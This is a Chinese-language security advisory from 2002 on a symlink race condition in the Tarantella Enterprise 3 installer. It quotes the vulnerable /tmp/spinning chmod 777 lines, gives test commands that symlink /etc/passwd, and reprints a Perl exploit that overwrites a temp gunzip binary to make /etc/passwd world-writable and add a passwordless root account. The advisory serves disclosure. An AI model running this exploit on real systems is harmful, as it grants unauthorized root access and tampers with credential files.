Tarantella Enterprise 3 存在符号连接漏洞发布时间:2002-02-22 更新时间:2002-02-22 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 BUGTRAQ ID:4115 受影响系统 Tarantella Enterprise 3 3.01详细描述 Tarantella Enterprise 3在安装过程中存在本地符号连接漏洞。 此漏洞可以用来权限提升,知道何时安装Tarantella的攻击者可以对'/tmp/spinning'建立符号连接到任意文件,当安装工具运行时,连接指向的文件将被改成全局可写。 问题存在于如下代码中: <----snip----> touch /tmp/spinning >/dev/null 2>&1 chmod 777 /tmp/spinning >/dev/null 2>&1 <----snip----> 如指向/etc/passwd,可使此文件全局可写。 测试代码 [lwc@misery] ln -s /etc/passwd /tmp/spinning 等待ROOT把程序安装... [lwc@misery] ls -l /etc/passwd - -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd ---------------------------------------------------------------- #!/usr/bin/perl -w #Another Exploit for tarantella enterprise 3 installation. #Larry Cashdollar lwc@vapid.dhs.org 2/08/2002 #Exploits gunzip$$ binary being created in /tmp with perm 777 #http://online.securityfocus.com/bid/3966 #Experimental ext3 kernel mods for preventing/researching race conditions. #http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html use strict; `cat << -EOF- > root.sh #!/bin/sh chmod 777 /etc/passwd echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd -EOF-`; my $OUT = ''; while(!$OUT) { $OUT = `ps -ax |grep gunzip |grep -v grep`; print "Found $OUT\n"; } my @args = split(' ',$OUT); # Do this with one copy operation. This will break installation of tarantella. # should test for -w on /etc/passwd stop and su - tarexp. while(1) { `cp root.sh $args[4]`; } 解决方案 尚无 相关信息 参考:http://online.securityfocus.com/archive/1/256909 相关主页:http://www.tarantella.com/products/e3/ |
